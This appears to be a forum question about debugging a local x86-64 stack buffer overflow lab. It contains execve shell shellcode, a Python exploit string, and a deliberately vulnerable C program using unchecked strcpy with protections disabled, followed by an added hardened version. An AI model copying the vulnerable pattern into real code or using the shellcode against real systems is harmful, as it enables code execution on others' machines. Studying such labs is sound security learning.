Shellcode: https://www.exploit-db.com/raw/42179

Exploit code (Python):

sh = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x50\x48\x31\xd2\x48\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05"
retaddr = "\x7f\xff\xff\xff\x00\x50\xe6"
print(sh + ("A" * (120 - len(sh) - 4)) + retaddr)

Vulnerable code (C):

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int main(int argc, char *argv[]) {
    char buffer[100];

    if (argc != 2) {
        fprintf(stderr, "Usage: %s <str>\n", argv[0]);
        exit(EXIT_FAILURE);
    }

    printf("buffer is here: %p\n", (void *)buffer);  /* %p expects a void * */
    strcpy(buffer, argv[1]);
    printf("copied %s into buffer\n", argv[1]);
    return 0;
}

The VM I am using is: ubuntu-9.04-server-amd64 (2.6.28-11).

How I compile the vulnerable code:

gcc vuln.c -U_FORTIFY_SOURCE -fno-pie -fno-stack-protector -fno-omit-frame-pointer -ggdb -z execstack -o vuln

The problem I seem to be running into is that I can't figure out how to get the rip register to go to the correct return address.

Output:

...
buffer is here: 0x7fffffffe650
...
Program received signal SIGSEGV, Segmentation fault.
0x0007ffff700e650 in ?? ()

Can someone help?

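For contrast, here is an added hardened version of the vulnerable program above (my code, not the asker's): the copy is bounded by the destination size, so an argument longer than the buffer is rejected instead of overwriting the saved return address. The helper name bounded_copy is my own.

```c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

#define BUFSZ 100

/* Copy src into dst only if it fits, NUL terminator included.
 * Returns 0 on success, -1 if src is too long; dst is untouched on failure. */
int bounded_copy(char *dst, size_t dstsz, const char *src) {
    size_t n = 0;
    /* Scan at most dstsz bytes of src so an unterminated source cannot be over-read. */
    while (n < dstsz && src[n] != '\0')
        n++;
    if (n >= dstsz)
        return -1;            /* would overflow, or leave no room for the NUL */
    memcpy(dst, src, n + 1);  /* n + 1 <= dstsz, terminator included */
    return 0;
}

int main(int argc, char *argv[]) {
    char buffer[BUFSZ];

    if (argc != 2) {
        fprintf(stderr, "Usage: %s <str>\n", argv[0]);
        exit(EXIT_FAILURE);
    }

    /* The unchecked strcpy(buffer, argv[1]) is replaced by a length-checked copy. */
    if (bounded_copy(buffer, sizeof buffer, argv[1]) != 0) {
        fprintf(stderr, "input too long (max %zu bytes)\n", sizeof buffer - 1);
        exit(EXIT_FAILURE);
    }
    printf("copied %s into buffer\n", buffer);
    return 0;
}
```

Even with this check, compiling without -fno-stack-protector and -z execstack keeps the canary and non-executable stack as a second line of defence.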